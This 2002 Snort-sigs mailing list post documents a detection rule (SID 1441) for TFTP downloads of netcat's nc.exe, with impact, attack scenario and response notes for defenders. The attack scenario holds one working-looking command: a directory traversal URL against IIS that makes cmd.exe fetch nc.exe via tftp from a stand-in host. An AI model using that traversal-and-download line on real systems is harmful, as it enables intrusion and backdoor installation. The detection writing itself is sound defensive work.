[Snort-sigs] SID 1441

warchild at ...288... warchild at ...288...
Sun Apr 28 15:28:03 EDT 2002


pcap attached
###





--
Rule:
alert udp any any -> any 69 (msg:"TFTP GET nc.exe"; content: "|0001|";
offset:0; depth:2; content:"nc.exe"; nocase;
classtype:successful-admin; sid:1441; rev:1;) 

--
Sid:
1441

--
Summary:
Someone attempted to get a file named 'nc.exe' via tftp.

--
Impact:
This generally means that your windows system has been compromised
(via any number of avenues) and the attacker is making an easy
backdoor for him/herself to walk back through.  Although using netcat
does not require any special privileges, such activity should always
be considered potentially hostile.

--
Detailed Information:
Someone tried to retrieve a netcat executable via tftp.  Netcat is the
swiss-army knife of must-have networking tools and is extremely useful
for creating backdoors, among other things.

--
Attack Scenarios:
After compromising your system or gaining some sort of access, an
attacker may prefer to make a backdoor so that future access is
easier.  netcat (commonly distributed as 'nc.exe') is a popular method
of doing this.  Since tftp can be executed in 'one shot, one kill'
mode, it is possible for an attacker to compromise your system and
tftp in a copy of netcat in one step.  i.e.,

lynx
'http://www.vulnerable.org/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+tftp%20foobar.org%20get%20nc.exe'


--
Ease of Attack:
Trivial.  tftp is available on nearly all *nix and windows machines
and is extremely easy to use.  Acquisition and proper use of netcat is 
another thing.

--
False Positives:
Highly unlikely.

--
False Negatives:
None.

--
Corrective Action:
Determine whether someone was tftp'ing to or from your system.
Chances are extremely good that the attacker was tftp'ing from your
system to a remote one in an attempt to get the netcat executable.
Determine if netcat is listening on a port and act accordingly.  Patch
the hole that they walked through.

--
Contributors:
warchild at ...288...

-- 
Additional References:
http://www.atstake.com/research/tools/nc110.txt
-------------- next part --------------
A non-text attachment was scrubbed...
Name: tftp-nc.exe.tcpdump
Type: application/octet-stream
Size: 100 bytes
Desc: not available
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20020428/9da054fb/attachment.obj>


More information about the Snort-sigs mailing list